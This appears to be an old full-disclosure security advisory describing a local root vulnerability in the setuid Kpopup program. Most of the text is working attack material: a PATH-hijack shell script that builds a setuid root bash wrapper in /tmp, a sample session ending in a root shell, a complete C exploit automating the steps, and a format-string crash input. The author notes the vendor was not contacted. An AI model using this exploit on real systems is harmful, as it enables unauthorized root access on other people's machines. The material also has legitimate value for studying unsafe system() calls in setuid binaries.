kpopup.txt

`  
  
A local root vuln exists in Kpopup version 0.9.1(latest) and   
proberly all other versions. It is avaliable from  
http://www.henschelsoft.de/kpopup_en.html (main site)  
http://www.freebsd.org/ports/net.html  
and many other places if you search kpopup on google.  
  
I. BACKGROUND  
  
Kpopup is a KDE program for sending and receiving MS Windows WinPopup   
messages. When package is compiled and install the binary kpopup gets  
installed suid root it also comes as part of FreeBSD ports collection.  
  
II. DESCRIPTION & EXPLOIT  
This app uses the system() call which is very unsafe expecially  
on a suid root binary. It also contains Format string bugs in the   
sprintf() function. In this advisory i will explain how to obtain  
root privlages from this app by exploiting system(). There is 3   
places on the misc.cpp source that use system(). The one we use to  
exploit this is on line 106.  
  
void sendSignalForNewMessage() {  
char command[50];  
  
sprintf(command, "killall -USR1 kpopup");  
system(command);  
}  
  
To exploit this what we need to do is make a shell script and call it  
killall and place it in the /tmp directory. Here is a script that i   
wrote to exlpoit it.  
  
#!/bin/sh  
cd /tmp  
/bin/cat > shell.c << EOF  
#include <stdio.h>  
int main()  
{  
setuid(0);  
setgid(0);  
execl("/bin/bash", "-bash", NULL);  
return 0;  
}  
EOF  
/usr/bin/gcc /tmp/shell.c -o /tmp/shell  
/bin/chown root.root shell  
/bin/chmod 6711 shell  
echo "NOW HERE IS YOUR ROOT SHELL"  
/tmp/shell  
  
so place this in /tmp as killall and chmod +x it. Now what we need to   
do is.  
export   
PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:  
  
Once this is done all we need to do is run the binary like so.  
/usr/local/kde/bin/kpopup root shell  
and thats it we now have root privs.  
  
an example run of this...  
  
[b0f@b0f b0f]$ export  
PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:  
[b0f@b0f b0f]$ /usr/local/kde/bin/kpopup root shell  
fileerror!  
NOW HERE IS YOUR ROOT SHELL  
[root@b0f tmp]#  
  
The format strings bugs are in that main.cpp source line 56 and 60  
they can be triggered by   
[b0f@b0f b0f]$ /usr/local/kde/bin/kpopup %n%n %n%n  
Segmentation fault  
[b0f@b0f b0f]$  
  
I haven't exploited the fmt bugs. There also seems to be possable race   
condtions   
in kpopup.  
  
III. EXPLOIT  
  
/*Local root exploit for kpopup  
*by b0f www.b0f.net  
*/  
#include <stdio.h>  
int main()  
{  
setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\  
/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:");  
FILE *fd;  
fd = fopen("/tmp/killall", "w");{  
fprintf(fd, "#!/bin/sh\n");  
fprintf(fd, "cd /tmp\n");  
fprintf(fd, "/bin/cat > shell.c << EOF\n");  
fprintf(fd, "#include <stdio.h>\n");  
fprintf(fd, "int main()\n");  
fprintf(fd, "{\n");  
fprintf(fd, "setuid(0);\n");  
fprintf(fd, "setgid(0);\n");  
fprintf(fd, "execl(\"/bin/bash\", \"-bash\", NULL);\n");  
fprintf(fd, "return 0;\n");  
fprintf(fd, "}\n");  
fprintf(fd, "EOF\n");  
fprintf(fd, "/usr/bin/gcc /tmp/shell.c -o /tmp/shell\n");  
fprintf(fd, "/bin/chown root.root /tmp/shell\n");  
fprintf(fd, "/bin/chmod 6711 /tmp/shell\n");  
fprintf(fd, "echo NOW HERE IS YOUR ROOT SHELL\n");  
fprintf(fd, "/tmp/shell\n");  
fclose(fd);  
system("chmod +x /tmp/killall");  
system("/usr/local/kde/bin/kpopup root shell");  
return 0;  
}  
}  
  
  
IV. ANALYSIS  
  
An attacker could exploit this issue on a machine running kpopup to   
obtain root privileges.  
  
V.DETECTION  
  
This is vulnerable in all versions off kpopup tested on Redhat 9.0  
  
VI. VENDOR  
  
The vendor has not been contacted about this issue.  
  
Regards  
b0f (Alan M)  
www.b0f.net  
`